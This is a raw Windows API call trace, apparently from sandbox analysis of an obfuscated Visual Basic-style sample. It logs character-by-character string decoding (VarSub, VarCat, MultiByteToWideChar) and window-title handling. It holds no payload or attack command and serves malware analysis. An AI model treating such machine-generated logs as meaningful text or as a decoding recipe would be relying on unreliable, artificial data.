MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.857] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.858] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.858] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.858] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.859] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.859] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.859] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.860] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.860] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.860] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.861] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.862] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.862] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.863] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.863] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.863] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.864] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.864] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.864] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.865] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.865] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.865] GetForegroundWindow () returned 0x102c2 [0086.865] GetLastError () returned 0x0 [0086.866] SysStringLen (param_1=" ") returned 0xff [0086.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.866] SysStringLen (param_1=" ") returned 0xff [0086.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.866] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.866] GetLastError () returned 0x0 [0086.866] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.866] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.867] SysStringLen (param_1="Activity Arrive Event") returned 0x16 [0086.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Activity Arrive Event", cchWideChar=23, lpMultiByteStr=0xe3732c, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Activity Arrive Event", lpUsedDefaultChar=0x0) returned 23 [0086.867] SetWindowTextA (hWnd=0x2036e, lpString="Activity Arrive Event") returned 1 [0086.867] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0086.867] GetFocus () returned 0x0 [0086.867] lstrlenA (lpString="Activity Arrive Event") returned 21 [0086.867] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe3732c) returned 0x1 [0086.867] IsWindow (hWnd=0x2036e) returned 1 [0086.868] IsWindow (hWnd=0x2036e) returned 1 [0086.868] IsWindow (hWnd=0x2036e) returned 1 [0086.868] IsWindow (hWnd=0x2036e) returned 1 [0086.868] GetFocus () returned 0x0 [0086.868] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x15 [0086.869] GetFocus () returned 0x0 [0086.869] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x16) returned 0x3102b58 [0086.869] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x16, lParam=0x3102b58) returned 0x15 [0086.869] GetFocus () returned 0x0 [0086.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0086.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=-1, lpWideCharStr=0xe3732c, cchWideChar=22 | out: lpWideCharStr="Activity Arrive Event") returned 22 [0086.869] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102b58 | out: hHeap=0x30f0000) returned 1 [0086.869] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0086.870] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0086.870] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.871] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.871] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.872] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.872] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.872] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.873] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.873] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.873] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.874] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.874] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.875] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.875] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.875] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.876] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.876] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.882] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.882] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.882] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.883] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.883] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.884] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.884] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.884] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.885] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.885] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.885] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.886] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.886] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.886] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.887] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.887] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.887] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.888] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.888] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.889] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.889] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.889] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.890] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.890] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.890] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.891] 